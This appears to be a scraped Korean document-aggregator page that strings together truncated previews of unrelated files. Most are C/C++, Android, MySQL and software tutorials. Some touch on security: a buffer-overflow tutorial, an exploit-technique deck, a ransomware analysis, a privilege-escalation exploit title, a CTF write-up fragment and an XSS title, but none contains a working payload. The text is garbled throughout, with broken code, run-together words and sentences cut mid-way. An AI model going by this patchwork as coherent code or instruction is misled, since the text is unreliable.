#include int main(void) int num; printf( Please enter an integer: "); scanf("%d", &num); if ( num < 0 ) printf("is negative.\n"); printf("num = %d\n", num); return 0; 1 학습목표 스트림의 기본 개념을 알아보고,
More informationPathEye 공식 블로그 다운로드 받으세요!! 지속적으로 업그래이드 됩니다. 여러분의 의견을 주시면 개발에 반영하겠 습니다.
PathEye Mobile Ver. 0.71b 2009. 3. 17 By PathEye 공식 블로그 다운로드 받으세요!! http://blog.patheye.com 지속적으로 업그래이드 됩니다. 여러분의 의견을 주시면 개발에 반영하겠 습니다. PathEye 설치 1/3 최종 배포 버전을 다 운로드 받습니다. 다운로드된 파일은 CAB 파일입니다. CAB 파일에는
More informationMicrosoft PowerPoint SDK설치.HelloAndroid(1.5h).pptx
To be an Android Expert 문양세강원대학교 IT 대학컴퓨터학부 개발환경구조및설치순서 JDK 설치 Eclipse 설치 안드로이드 SDK 설치 ADT(Androd Development Tools) 설치 AVD(Android Virtual Device) 생성 Hello Android! 2 Eclipse (IDE) JDK Android SDK with
More informationAPI STORE 키발급및 API 사용가이드 Document Information 문서명 : API STORE 언어별 Client 사용가이드작성자 : 작성일 : 업무영역 : 버전 : 1 st Draft. 서브시스템 : 문서번호 : 단계 : Docum
API STORE 키발급및 API 사용가이드 Document Information 문서명 : API STORE 언어별 Client 사용가이드작성자 : 작성일 : 2012.11.23 업무영역 : 버전 : 1 st Draft. 서브시스템 : 문서번호 : 단계 : Document Distribution Copy Number Name(Role, Title) Date
More information버퍼오버플로우-왕기초편 10. 메모리를 Hex dump 뜨기 앞서우리는버퍼오버플로우로인해리턴어드레스 (return address) 가변조될수있음을알았습니다. 이제곧리턴어드레스를원하는값으로변경하는실습을해볼것인데요, 그전에앞서, 메모리에저장된값들을살펴보는방법에대해배워보겠습
앞서우리는버퍼오버플로우로인해리턴어드레스 (return address) 가변조될수있음을알았습니다. 이제곧리턴어드레스를원하는값으로변경하는실습을해볼것인데요, 그전에앞서, 메모리에저장된값들을살펴보는방법에대해배워보겠습니다. 여러분모두 Windows 에서 hex editor(hex dump, hex viewer) 라는것을사용해보셨을겁니다. 바로바이너리파일을 16 진수
More information강의 개요
DDL TABLE 을만들자 웹데이터베이스 TABLE 자료가저장되는공간 문자자료의경우 DB 생성시지정한 Character Set 대로저장 Table 생성시 Table 의구조를결정짓는열속성지정 열 (Clumn, Attribute) 은이름과자료형을갖는다. 자료형 : http://dev.mysql.cm/dc/refman/5.1/en/data-types.html TABLE
More information<4D F736F F F696E74202D20B8AEB4AABDBA20BFC0B7F920C3B3B8AEC7CFB1E22E BC8A3C8AF20B8F0B5E55D>
리눅스 오류처리하기 2007. 11. 28 안효창 라이브러리함수의오류번호얻기 errno 변수기능오류번호를저장한다. 기본형 extern int errno; 헤더파일 라이브러리함수호출에실패했을때함수예 정수값을반환하는함수 -1 반환 open 함수 포인터를반환하는함수 NULL 반환 fopen 함수 2 유닉스 / 리눅스 라이브러리함수의오류번호얻기 19-1
More information8장 문자열
8 장문자열 박창이 서울시립대학교통계학과 박창이 ( 서울시립대학교통계학과 ) 8 장문자열 1 / 24 학습내용 문자열 (string) 훑기 (traversal) 부분추출 (slicing) print 함수불변성 (immutablity) 검색 (search) 세기 (count) Method in 연산자비교 박창이 ( 서울시립대학교통계학과 ) 8 장문자열 2 /
More informationView Licenses and Services (customer)
빠른 빠른 시작: 시작: 라이선스, 라이선스, 서비스 서비스 및 주문 주문 이력 이력 보기 보기 고객 가이드 Microsoft 비즈니스 센터의 라이선스, 서비스 및 혜택 섹션을 통해 라이선스, 온라인 서비스, 구매 기록 (주문 기록)을 볼 수 있습니다. 시작하려면, 비즈니스 센터에 로그인하여 상단 메뉴에서 재고를 선택한 후 내 재고 관리를 선택하십시오. 목차
More informationDeok9_Exploit Technique
Exploit Technique CodeEngn Co-Administrator!!! and Team Sur3x5F Member Nick : Deok9 E-mail : DDeok9@gmail.com HomePage : http://deok9.sur3x5f.org Twitter :@DDeok9 > 1. Shell Code 2. Security
More information설계란 무엇인가?
금오공과대학교 C++ 프로그래밍 jhhwang@kumoh.ac.kr 컴퓨터공학과 황준하 6 강. 함수와배열, 포인터, 참조목차 함수와포인터 주소값의매개변수전달 주소의반환 함수와배열 배열의매개변수전달 함수와참조 참조에의한매개변수전달 참조의반환 프로그래밍연습 1 /15 6 강. 함수와배열, 포인터, 참조함수와포인터 C++ 매개변수전달방법 값에의한전달 : 변수값,
More information중간고사
중간고사 예제 1 사용자로부터받은두개의숫자 x, y 중에서큰수를찾는알고리즘을의사코드로작성하시오. Step 1: Input x, y Step 2: if (x > y) then MAX
More information경우 1) 80GB( 원본 ) => 2TB( 복사본 ), 원본 80GB 는 MBR 로디스크초기화하고 NTFS 로포맷한경우 복사본 HDD 도 MBR 로디스크초기화되고 80GB 만큼포맷되고나머지영역 (80GB~ 나머지부분 ) 은할당되지않음 으로나온다. A. Window P
Duplicator 는기본적으로원본하드디스크를빠르게복사본하드디스크에복사하는기능을하는것입니다.. 복사본 하드디스크가원본하드디스크와똑같게하는것을목적으로하는것이어서저용량에서고용량으로복사시몇 가지문제점이발생할수있습니다. 하드디스크는사용하려면, 디스크초기화를한후에포맷을해야사용가능합니다. Windows PC는 MBR과 GPT 2 개중에 1개로초기화합니다. -Windows
More informationC++ Programming
C++ Programming 연산자다중정의 Seo, Doo-okok clickseo@gmail.com http://www.clickseo.com 목 차 연산자다중정의 C++ 스타일의문자열 2 연산자다중정의 연산자다중정의 단항연산자다중정의 이항연산자다중정의 cin, cout 그리고 endl C++ 스타일의문자열 3 연산자다중정의 연산자다중정의 (Operator
More information<443A5C4C C4B48555C B3E25C32C7D0B1E25CBCB3B0E8C7C1B7CEC1A7C6AE425CC0E7B0EDB0FCB8AE5C53746F636B5F4D616E D656E74732E637070>
1 #include 2 #include 3 #include 4 #include 5 #include 6 #include "QuickSort.h" 7 using namespace std; 8 9 10 Node* Queue[100]; // 추가입력된데이터를저장하기위한 Queue
More informationChapter_06
프로그래밍 1 1 Chapter 6. Functions and Program Structure April, 2016 Dept. of software Dankook University http://embedded.dankook.ac.kr/~baeksj 이장의강의목표 2 문자의입력방법을이해한다. 중첩된 if문을이해한다. while 반복문의사용법을익힌다. do 반복문의사용법을익힌다.
More information$ret = ""; $socket = fsockopen(" ", 8888, $errno, $errstr, 100); fgets( $socket, 50); fgets( $socket, 50); $ret.= fgets( $socket, 50); $
The 5eX m2n 푼문제 : O O O X O X X O O X O O O O X O X O O O level1 : parse string Level1은 210:207.246.131 이라는 IP와 8888이라는포트번호가주어진다. 접속하여보면, base64로인코딩된스트링을보여주면서, Plain text를전송하라고한다. Base64된스트링을디코드해보면, beistlab
More information<41736D6C6F D20B9AEBCADBEE7BDC42E687770>
IDA Remote Debugging 2007. 01. 이강석 / certlab@gmail.com http://www.asmlove.co.kr - 1 - Intro IDA Remote debugging에대해알아봅시다. 이런기능이있다는것을잘모르시는분들을위해문서를만들었습니다. IDA 기능중에분석할파일을원격에서디버깅할수있는기능이있는데먼저그림과함께예를들어설명해보도록하겠습니다.
More information슬라이드 1
Pairwise Tool & Pairwise Test NuSRS 200511305 김성규 200511306 김성훈 200614164 김효석 200611124 유성배 200518036 곡진화 2 PICT Pairwise Tool - PICT Microsoft 의 Command-line 기반의 Free Software www.pairwise.org 에서다운로드후설치
More information프로그램을 학교 등지에서 조금이라도 배운 사람들을 위한 프로그래밍 노트 입니다. 저 역시 그 사람들 중 하나 입니다. 중고등학교 시절 학교 도서관, 새로 생긴 시립 도서관 등을 다니며 책을 보 고 정리하며 어느정도 독학으르 공부하긴 했지만, 자주 안하다 보면 금방 잊어
개나리 연구소 C 언어 노트 (tyback.egloos.com) 프로그램을 학교 등지에서 조금이라도 배운 사람들을 위한 프로그래밍 노트 입니다. 저 역시 그 사람들 중 하나 입니다. 중고등학교 시절 학교 도서관, 새로 생긴 시립 도서관 등을 다니며 책을 보 고 정리하며 어느정도 독학으르 공부하긴 했지만, 자주 안하다 보면 금방 잊어먹고 하더라구요. 그래서,
More informationPowerPoint 프레젠테이션
Chapter 12 표준입출력과파일입출력... 1. 표준입출력함수 2. 파일입출력함수 1. 표준입출력함수 표준입출력함수 표준입력 (stdin, Standard Input) : 키보드입력 표준출력 (stdout, StandardOutput) : 모니터출력 1. 표준입출력함수 서식화된입출력함수 printf(), scanf() 서식의위치에올수있는것들 [ 기본 11-1]
More informationC 프로그래밍 언어 입문 C 프로그래밍 언어 입문 김명호저 숭실대학교 출판국 머리말..... C, C++, Java, Fortran, Python, Ruby,.. C. C 1972. 40 C.. C. 1999 C99. C99. C. C. C., kmh ssu.ac.kr.. ,. 2013 12 Contents 1장 프로그래밍 시작 1.1 C 10 1.2 12
More informationWindows Server 2012
Windows Server 2012 Shared Nothing Live Migration Shared Nothing Live Migration 은 SMB Live Migration 방식과다른점은 VM 데이터파일의위치입니다. Shared Nothing Live Migration 방식은 Hyper-V 호스트의로컬디스크에 VM 데이터파일이위치합니다. 반면에, SMB
More informationA Hierarchical Approach to Interactive Motion Editing for Human-like Figures
단일연결리스트 (Singly Linked List) 신찬수 연결리스트 (linked list)? tail 서울부산수원용인 null item next 구조체복습 struct name_card { char name[20]; int date; } struct name_card a; // 구조체변수 a 선언 a.name 또는 a.date // 구조체 a의멤버접근 struct
More informationActFax 4.31 Local Privilege Escalation Exploit
NSHC 2013. 05. 23 악성코드 분석 보고서 [ Ransomware 악성코드 ] 사용자의 컴퓨터를 강제로 잠그고 돈을 요구하는 형태의 공격이 기승을 부리고 있 습니다. 이러한 형태의 공격에 이용되는 악성코드는 Ransomware로 불리는 악성코 드 입니다. 한번 감염 시 치료절차가 복잡하며, 보고서 작성 시점을 기준으로 지속 적인 피해자가 발생되고
More information게시판 스팸 실시간 차단 시스템
오픈 API 2014. 11-1 - 목 차 1. 스팸지수측정요청프로토콜 3 1.1 스팸지수측정요청프로토콜개요 3 1.2 스팸지수측정요청방법 3 2. 게시판스팸차단도구오픈 API 활용 5 2.1 PHP 5 2.1.1 차단도구오픈 API 적용방법 5 2.1.2 차단도구오픈 API 스팸지수측정요청 5 2.1.3 차단도구오픈 API 스팸지수측정결과값 5 2.2 JSP
More informationC 프로그램의 기본
C 프로그램의기본 목차 C 프로그램의구성요소 주석 main 함수 출력 C 언어의입력과출력 변수 printf 함수 scanf 함수 2 예제 2-1 : 첫번째 C 프로그램 3 2.1.1 주석 주석의용도 프로그램에대한설명 프로그램전체에대한대략적인정보를제공 프로그램수행에영향을미치지않는요소 4 2.1.1 주석 주석사용방법 /* 과 */ 을이용한여러줄주석 // 을이용한한줄주석
More information8 장데이터베이스 8.1 기본개념 - 데이터베이스 : 데이터를조직적으로구조화한집합 (cf. 엑셀파일 ) - 테이블 : 데이터의기록형식 (cf. 엑셀시트의첫줄 ) - 필드 : 같은종류의데이터 (cf. 엑셀시트의각칸 ) - 레코드 : 데이터내용 (cf. 엑셀시트의한줄 )
8 장데이터베이스 8.1 기본개념 - 데이터베이스 : 데이터를조직적으로구조화한집합 (cf. 엑셀파일 ) - 테이블 : 데이터의기록형식 (cf. 엑셀시트의첫줄 ) - 필드 : 같은종류의데이터 (cf. 엑셀시트의각칸 ) - 레코드 : 데이터내용 (cf. 엑셀시트의한줄 ) - DDL(Data Definition Language) : show, create, drop
More information메뉴얼41페이지-2
데이터 기반 맞춤형 성장관리 솔루션 스마트빌 플러스 은행계좌등록 은행계좌를 조회하여 등록합니다. 신용카드등록 신용카드를 조회하여 등록합니다. 금융정보 자동수집을 위하여 인증서이름, 아이디, 비밀번호를 등록합니다. 통합 자동 수집 금융정보 통합 자동수집을 실행합니다 은행계좌등록 은행계좌를 조회하여 등록합니다. 신용카드등록 신용카드를 조회하여
More informationData Sync Manager(DSM) Example Guide Data Sync Manager (DSM) Example Guide DSM Copyright 2003 Ari System, Inc. All Rights reserved. Data Sync Manager
Data Sync Manager (DSM) Example Guide DSM Copyright 2003 Ari System, Inc. All Rights reserved. Data Sync Manager are trademarks or registered trademarks of Ari System, Inc. 1 Table of Contents Chapter1
More informationUI TASK & KEY EVENT
T9 & AUTOMATA 2007. 3. 23 PLATFORM TEAM 정용학 차례 T9 개요 새로운언어 (LDB) 추가 T9 주요구조체 / 주요함수 Automata 개요 Automata 주요함수 추후세미나계획 질의응답및토의 T9 ( 2 / 30 ) T9 개요 일반적으로 cat 이라는단어를쓸려면... 기존모드 (multitap) 2,2,2, 2,8 ( 총 6번의입력
More information문서의 제목 나눔고딕B, 54pt
산업공학과를위한 프로그래밍입문 (w/ 파이썬 ) PART II : Python 활용 가천대학교 산업경영공학과 최성철교수 간단한파일다루기 [ 생각해보기 ] 우리는어떻게프로그램을시작하나? 보통은이렇게생긴아이콘을누른다! 그러나실제로는아이콘이아닌 실행파일 을실행시키는것아이콘을클릭하고오른쪽마우스클릭 속성 을선택해볼것 [ 생각해보기 ] 옆과같은화면이나올것이다대상에있는
More informationVisual Basic 반복문
학습목표 반복문 For Next문, For Each Next문 Do Loop문, While End While문 구구단작성기로익히는반복문 2 5.1 반복문 5.2 구구단작성기로익히는반복문 3 반복문 주어진조건이만족하는동안또는주어진조건이만족할때까지일정구간의실행문을반복하기위해사용 For Next For Each Next Do Loop While Wend 4 For
More informationhlogin2
0x02. Stack Corruption off-limit Kernel Stack libc Heap BSS Data Code off-limit Kernel Kernel : OS Stack libc Heap BSS Data Code Stack : libc : Heap : BSS, Data : bss Code : off-limit Kernel Kernel : OS
More informationPowerPoint 프레젠테이션
Web server porting 2 Jo, Heeseung Web 을이용한 LED 제어 Web 을이용한 LED 제어프로그램 web 에서데이터를전송받아타겟보드의 LED 를조작하는프로그램을작성하기위해다음과같은소스파일을생성 2 Web 을이용한 LED 제어 LED 제어프로그램작성 8bitled.html 파일을작성 root@ubuntu:/working/web# vi
More information금오공대 컴퓨터공학전공 강의자료
C 프로그래밍프로젝트 Chap 14. 포인터와함수에대한이해 2013.10.09. 오병우 컴퓨터공학과 14-1 함수의인자로배열전달 기본적인인자의전달방식 값의복사에의한전달 val 10 a 10 11 Department of Computer Engineering 2 14-1 함수의인자로배열전달 배열의함수인자전달방식 배열이름 ( 배열주소, 포인터 ) 에의한전달 #include
More informationJAVA 프로그래밍실습 실습 1) 실습목표 - 메소드개념이해하기 - 매개변수이해하기 - 새메소드만들기 - Math 클래스의기존메소드이용하기 ( ) 문제 - 직사각형모양의땅이있다. 이땅의둘레, 면적과대각
JAVA 프로그래밍실습 실습 1) 실습목표 - 메소드개념이해하기 - 매개변수이해하기 - 새메소드만들기 - Math 클래스의기존메소드이용하기 ( http://java.sun.com/javase/6/docs/api ) 문제 - 직사각형모양의땅이있다. 이땅의둘레, 면적과대각선의길이를계산하는메소드들을작성하라. 직사각형의가로와세로의길이는주어진다. 대각선의길이는 Math클래스의적절한메소드를이용하여구하라.
More informationWindows 8에서 BioStar 1 설치하기
/ 콘텐츠 테이블... PC에 BioStar 1 설치 방법... Microsoft SQL Server 2012 Express 설치하기... Running SQL 2012 Express Studio... DBSetup.exe 설정하기... BioStar 서버와 클라이언트 시작하기... 1 1 2 2 6 7 1/11 BioStar 1, Windows 8 BioStar
More informationMicrosoft PowerPoint - polling.pptx
지현석 (binish@home.cnu.ac.kr) http://binish.or.kr Index 이슈화된키보드해킹 최근키보드해킹이슈의배경지식 Interrupt VS polling What is polling? Polling pseudo code Polling 을이용한키로거분석 방어기법연구 이슈화된키보드해킹 키보드해킹은연일상한가! 주식, 펀드투자의시기?! 최근키보드해킹이슈의배경지식
More informationStuduino소프트웨어 설치
Studuino 프로그래밍환경 Studuino 소프트웨어설치 본자료는 Studuino 프로그래밍환경설치안내서입니다. Studuino 프로그래밍 환경의갱신에따라추가 / 수정될수있습니다. 목차 1. 소개... 1 2. Windows... 2 2.1. 프로그래밍환경설치... 2 2.1.1. 웹설치버전설치방법... 2 2.2. Studuino 프로그래밍환경실행...
More informationMicrosoft PowerPoint - Java7.pptx
HPC & OT Lab. 1 HPC & OT Lab. 2 실습 7 주차 Jin-Ho, Jang M.S. Hanyang Univ. HPC&OT Lab. jinhoyo@nate.com HPC & OT Lab. 3 Component Structure 객체 (object) 생성개념을이해한다. 외부클래스에대한접근방법을이해한다. 접근제어자 (public & private)
More informationMicrosoft PowerPoint - MonthlyInsighT-2018_9월%20v1[1]
* 넋두리 * 저는주식을잘한다고생각합니다. 정확하게는주식감각이있다는것이맞겠죠? 예전에애널리스트가개인주식을할수있었을때수익률은엄청났었습니다 @^^@. IT 먼쓸리가 4주년이되었습니다. 2014년 9월부터시작하였으니지난달로만 4년이되었습니다. 4년간누적수익률이최선호주는 +116.0%, 차선호주는 -29.9% 입니다. 롱-숏으로계산하면 +145.9% 이니나쁘지않은숫자입니다.
More informationThe Pocket Guide to TCP/IP Sockets: C Version
인터넷프로토콜 5 장 데이터송수신 (3) 1 파일전송메시지구성예제 ( 고정크기메시지 ) 전송방식 : 고정크기 ( 바이너리전송 ) 필요한전송정보 파일이름 ( 최대 255 자 => 255byte 의메모리공간필요 ) 파일크기 (4byte 의경우최대 4GB 크기의파일처리가능 ) 파일내용 ( 가변길이, 0~4GB 크기 ) 메시지구성 FileName (255bytes)
More informationMicrosoft PowerPoint - chap05-제어문.pptx
int num; printf( Please enter an integer: "); scanf("%d", &num); if ( num < 0 ) printf("is negative.\n"); printf("num = %d\n", num); 1 학습목표 제어문인,, 분기문에 대해 알아본다. 인 if와 switch의 사용 방법과 사용시 주의사항에 대해 알아본다.
More informationC 언어 프로그래밊 과제 풀이
과제풀이 (1) 홀수 / 짝수판정 (1) /* 20094123 홍길동 20100324 */ /* even_or_odd.c */ /* 정수를입력받아홀수인지짝수인지판정하는프로그램 */ int number; printf(" 정수를입력하시오 => "); scanf("%d", &number); 확인 주석문 가필요한이유 printf 와 scanf 쌍
More informationMicrosoft PowerPoint - ch07 - 포인터 pm0415
2015-1 프로그래밍언어 7. 포인터 (Pointer), 동적메모리할당 2015 년 4 월 4 일 교수김영탁 영남대학교공과대학정보통신공학과 (Tel : +82-53-810-2497; Fax : +82-53-810-4742 http://antl.yu.ac.kr/; E-mail : ytkim@yu.ac.kr) Outline 포인터 (pointer) 란? 간접참조연산자
More information새로운 지점에서 단이 시작하는 경우 기둥코로 시작하라고 표시합니다. 기둥코(standing stitch)로 시작하는 방법은 YouTube 에서 찾아볼 수 있습니다. 특수 용어 팝콘뜨기: 1 코에 한길긴뜨기 5 코, 바늘을 빼고 첫번째 한길긴뜨기코의 앞에서 바늘을 넣은
Desire Copyright: Helen Shrimpton, 2016. All rights reserved. By: Helen at www.crystalsandcrochet.com 12 인치 모티브 worsted/aran(10ply), 5mm 바늘 사용 약 10인치 Double Knitting(8ply), 4mm 바늘 사용 미국식 용어를 사용합니다. 약어
More information희망브리지
Building Your First Amazon VPC V3.5 2016.10 Index 01. Overview 02. Create the base VPC 03. Launch EC2 instances 04. Manually create public & private subnet 05. Launch a bastion windows host 06. Connect
More informationISP and CodeVisionAVR C Compiler.hwp
USBISP V3.0 & P-AVRISP V1.0 with CodeVisionAVR C Compiler http://www.avrmall.com/ November 12, 2007 Copyright (c) 2003-2008 All Rights Reserved. USBISP V3.0 & P-AVRISP V1.0 with CodeVisionAVR C Compiler
More information13 주차문자열의표현과입출력
13 주차문자열의표현과입출력 문자표현방법 문자열표현방법 문자열이란무엇인가? 문자열의입출력 문자처리라이브러리함수 표준입출력라이브러리함수 C 언어를이용하여문자열을처리하기위해서는문자형의배열이나포인터를사용하게된다. 문자열을처리하는동작으로는단순하게문자열의입력이나출력기능이외에도문자열의복사나치환, 문자열의길이를구하거나문자열을비교하는기능등많은기능을필요로한다. 그러나이러한기능들을모두구현하기란매우까다로우며,
More informationJava ...
컴퓨터언어 1 Java 제어문 조성일 조건문 : if, switch 어떠한조건을조사하여각기다른명령을실행 if 문, switch 문 if 문 if - else 문형식 if 문형식 if ( 조건식 ) { 명령문 1; 명령문 2;... if ( 조건식 ) { 명령문 1; 명령문 2;... else { 명령문 a; 명령문 b;... 예제 1 정수를입력받아짝수와홀수를판별하는프로그램을작성하시오.
More informationMicrosoft PowerPoint - 04-UDP Programming.ppt
Chapter 4. UDP Dongwon Jeong djeong@kunsan.ac.kr http://ist.kunsan.ac.kr/ Dept. of Informatics & Statistics 목차 UDP 1 1 UDP 개념 자바 UDP 프로그램작성 클라이언트와서버모두 DatagramSocket 클래스로생성 상호간통신은 DatagramPacket 클래스를이용하여
More informationSecure Programming Lecture1 : Introduction
Malware and Vulnerability Analysis Lecture3-2 Malware Analysis #3-2 Agenda 안드로이드악성코드분석 악성코드분석 안드로이드악성코드정적분석 APK 추출 #1 adb 명령 안드로이드에설치된패키지리스트추출 adb shell pm list packages v0nui-macbook-pro-2:lecture3 v0n$
More information가해하는 것은 좋지 않은 행동이라 생각하기 때문이다 불쌍해서이다 가해하고 나면 오히려 스트레스를 더 받을 것 같아서이다 보복이 두려워서이다 어떻게 그렇게 할 수 있는지 화가 나고 나쁜 아이라고 본다 그럴 수도 있다고 생각한다 아무런 생각이나 느낌이 없다 따돌리는 친구들을 경계해야겠다 남 여 중학생 고등학생 남 여 중학생 고등학생 남 여 중학생 고등학생 남 여
More informationPowerPoint 프레젠테이션
HTML5 웹프로그래밍입문 부록. 웹서버구축하기 1 목차 A.1 웹서버시스템 A.2 PHP 사용하기 A.3 데이터베이스연결하기 2 A.1 웹서버시스템 3 웹서버의구축 웹서버컴퓨터구축 웹서버소프트웨어설치및실행 아파치 (Apache) 웹서버가대표적 서버실행프로그램 HTML5 폼을전달받아처리 PHP, JSP, Python 등 데이터베이스시스템 서버측에데이터를저장및효율적관리
More informationMicrosoft Word - building the win32 shellcode 01.doc
Win32 Attack 1. Local Shellcode 작성방법 By 달고나 (Dalgona@wowhacker.org) Email: zinwon@gmail.com Abstract 이글은 MS Windows 환경에서 shellcode 를작성하는방법에대해서설명하고있다. Win32 는 *nix 환경과는사뭇다른 API 호출방식을사용하기때문에조금복잡하게둘러서 shellcode
More information슬라이드 1
핚국산업기술대학교 제 14 강 GUI (III) 이대현교수 학습안내 학습목표 CEGUI 라이브러리를이용하여, 게임메뉴 UI 를구현해본다. 학습내용 CEGUI 레이아웃의로딩및렌더링. OIS 와 CEGUI 의연결. CEGUI 위젯과이벤트의연동. UI 구현 : 하드코딩방식 C++ 코드를이용하여, 코드내에서직접위젯들을생성및설정 CEGUI::PushButton* resumebutton
More information강의 개요
정규화와 SELECT (II) 웹데이터베이스 학과 학생 과목 학과 지도교수 학과학번성명 수강과목 담당교수 A 김수정 A 0001 고길동 성질이론 김수정 B 허영만 A 0002 둘리 한식의멋 허영만 C 강풀 B 0003 희동이 심리학의이해 강풀 과목 _ 성적 학번 수강과목 성적 0001 성질이론 A 0001 한식의멋 C 0002 성질이론 A 0002 한식의멋
More informationMicrosoft Word _YISF_QUAL_WRITE-UP_pwn3r.docx
10th 청소년정보보호페스티벌 예선전문제풀이보고서 Name : 권혁 Nick : pwn3r Email : austinkwon2@gmail.com 1 2 WARMING-UP (1) Point : 50 Catergory : Trivial Type. WARMING-UP (1) [50] Subject [by. Rust] Heaven's;Gate Content " 시작은미미하지만그끝은창대하리라
More informationPA for SWE2007
Programming Assignment #0: Making own "my_string.h" SWE2007: Software Experiment II (Fall 2016) Due: 21st Sep. (Wed), 11:59 PM 1. Introduction 이번과제에선, 앞으로있을다른과제들을수행하기위한필요할함수들을구현한다. 그대상은, 문자열조작 / 검사 / 변환함수들을담은
More information윈도우시스템프로그래밍
데이타베이스 MySQL 을위한 MFC 를사용한 ODBC 프로그래밍 2013.05.15. 오병우 컴퓨터공학과금오공과대학교 http://www.apmsetup.com 또는 http://www.mysql.com APM Setup 설치발표자료참조 Department of Computer Engineering 2 DB 에속한테이블보기 show tables; 에러발생
More informationComputer Security Chapter 08. Format String 김동진 1 Secure Software Lab.
Computer Security Chapter 08. Format Strig 김동진 (kdjorag@gmail.com) http://securesw.dakook.ac.kr/ 1 목차 Format Strig Attack? Format Strig? Format Strig Attack 의원리 입력코드생성 Format Strig Attack (kerel v2.2,
More informationPowerPoint Presentation
FORENSICINSIGHT SEMINAR SQLite Recovery zurum herosdfrc@google.co.kr Contents 1. SQLite! 2. SQLite 구조 3. 레코드의삭제 4. 삭제된영역추적 5. 레코드복원기법 forensicinsight.org Page 2 / 22 SQLite! - What is.. - and why? forensicinsight.org
More information목차 1. 시스템요구사항 암호및힌트설정 ( 윈도우 ) JetFlash Vault 시작하기 ( 윈도우 ) JetFlash Vault 옵션 ( 윈도우 )... 9 JetFlash Vault 설정... 9 JetFlash Vault
사용자매뉴얼 JetFlash Vault 100 ( 버전 1.0) 1 목차 1. 시스템요구사항... 3 2. 암호및힌트설정 ( 윈도우 )... 3 3. JetFlash Vault 시작하기 ( 윈도우 )... 7 4. JetFlash Vault 옵션 ( 윈도우 )... 9 JetFlash Vault 설정... 9 JetFlash Vault 찾아보기... 10 JetFlash
More informationsimple ROP Exploit
SIMPLE ROP EXPLOIT 문제로풀어보는 ROP TigerTeam elttzero@tigerteam.kr 목차 1. 개요... 2 2. Buffer OverFlow... 2 3. BOF 방어기법... 3 3.1. DEP(Data Execution Prevention)... 3 3.2. ASLR(Address Space Layout Randomization)...
More information특징 찾아보기 열쇠 없이 문을 열 수 있어요! 비밀번호 및 RF카드로도 문을 열 수 있습니다. 또한 비밀번호가 외부인에게 알려질 위험에 대비, 통제번호까지 입력해 둘 수 있어 더욱 안심하고 사용할 수 있습니다. 나만의 비밀번호 및 RF카드를 가질 수 있어요! 다수의 가
www.kdnetwork.com 특징 찾아보기 열쇠 없이 문을 열 수 있어요! 비밀번호 및 RF카드로도 문을 열 수 있습니다. 또한 비밀번호가 외부인에게 알려질 위험에 대비, 통제번호까지 입력해 둘 수 있어 더욱 안심하고 사용할 수 있습니다. 나만의 비밀번호 및 RF카드를 가질 수 있어요! 다수의 가능할 삭제할 건전지 사용자를 위한 개별 비밀번호 및 RF카드
More informationMicrosoft PowerPoint - chap04-연산자.pptx
int num; printf( Please enter an integer: "); scanf("%d", &num); if ( num < 0 ) printf("is negative.\n"); printf("num = %d\n", num); } 1 학습목표 수식의 개념과 연산자, 피연산자에 대해서 알아본다. C의 를 알아본다. 연산자의 우선 순위와 결합 방향에
More information아이콘의 정의 본 사용자 설명서에서는 다음 아이콘을 사용합니다. 참고 참고는 발생할 수 있는 상황에 대처하는 방법을 알려 주거나 다른 기능과 함께 작동하는 방법에 대한 요령을 제공합니다. 상표 Brother 로고는 Brother Industries, Ltd.의 등록 상
Android 용 Brother Image Viewer 설명서 버전 0 KOR 아이콘의 정의 본 사용자 설명서에서는 다음 아이콘을 사용합니다. 참고 참고는 발생할 수 있는 상황에 대처하는 방법을 알려 주거나 다른 기능과 함께 작동하는 방법에 대한 요령을 제공합니다. 상표 Brother 로고는 Brother Industries, Ltd.의 등록 상표입니다. Android는
More information비트와바이트 비트와바이트 비트 (Bit) : 2진수값하나 (0 또는 1) 를저장할수있는최소메모리공간 1비트 2비트 3비트... n비트 2^1 = 2개 2^2 = 4개 2^3 = 8개... 2^n 개 1 바이트는 8 비트 2 2
비트연산자 1 1 비트와바이트 비트와바이트 비트 (Bit) : 2진수값하나 (0 또는 1) 를저장할수있는최소메모리공간 1비트 2비트 3비트... n비트 2^1 = 2개 2^2 = 4개 2^3 = 8개... 2^n 개 1 바이트는 8 비트 2 2 진수법! 2, 10, 16, 8! 2 : 0~1 ( )! 10 : 0~9 ( )! 16 : 0~9, 9 a, b,
More informationOracle VM VirtualBox 설치 VirtualBox에서 가상머신 설치 가상머신에 Ubuntu 설치
Oracle VM VirtualBox 설치 VirtualBox에서 가상머신 설치 가상머신에 Ubuntu 설치 VirtualBox를 사용하기 위해서는 일단 https://www.virtualbox.org/wiki/downloads 사이트에서 윈도우용 버추얼박스 설치화일을 다운로드 해야합니다. Ubuntu를 사용하기 위해서는 Ubuntu 디스크 이미지 화일을 다운로드
More informationMicrosoft PowerPoint - C++ 5 .pptx
C++ 언어프로그래밍 한밭대학교전자. 제어공학과이승호교수 연산자중복 (operator overloading) 이란? 2 1. 연산자중복이란? 1) 기존에미리정의되어있는연산자 (+, -, /, * 등 ) 들을프로그래머의의도에맞도록새롭게정의하여사용할수있도록지원하는기능 2) 연산자를특정한기능을수행하도록재정의하여사용하면여러가지이점을가질수있음 3) 하나의기능이프로그래머의의도에따라바뀌어동작하는다형성
More informationOffice 365 사용자 가이드
[ 여기에입력 ] Office 365 사용자가이드 OFFICE 365 모바일설정 목차 1. 모바일에메일계정추가하기... 2 2. Lync 2013 App 설치하기... 7 3. Office Mobile App 설치하기... 10 4. Office for ipad 설치하기... 16-1 - 모바일기기에 Office 365 를설정해보세요. 모바일기기에 Office
More informationC# Programming Guide - Types
C# Programming Guide - Types 최도경 lifeisforu@wemade.com 이문서는 MSDN 의 Types 를요약하고보충한것입니다. http://msdn.microsoft.com/enus/library/ms173104(v=vs.100).aspx Types, Variables, and Values C# 은 type 에민감한언어이다. 모든
More informationMicrosoft 을 열면 깔끔한 사용자 중심의 메뉴 및 레이아웃이 제일 먼저 눈에 띕니다. 또한 은 스마트폰, 테블릿 및 클라우드는 물론 가 설치되어 있지 않은 PC 에서도 사용할 수 있습니다. 따라서 장소와 디바이스에 관계 없이 언제, 어디서나 문서를 확인하고 편집
Modern Modern www.office.com ( ) 892 5 : 1577-9700 : http://www.microsoft.com/korea Microsoft 을 열면 깔끔한 사용자 중심의 메뉴 및 레이아웃이 제일 먼저 눈에 띕니다. 또한 은 스마트폰, 테블릿 및 클라우드는 물론 가 설치되어 있지 않은 PC 에서도 사용할 수 있습니다. 따라서 장소와
More informationXSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks
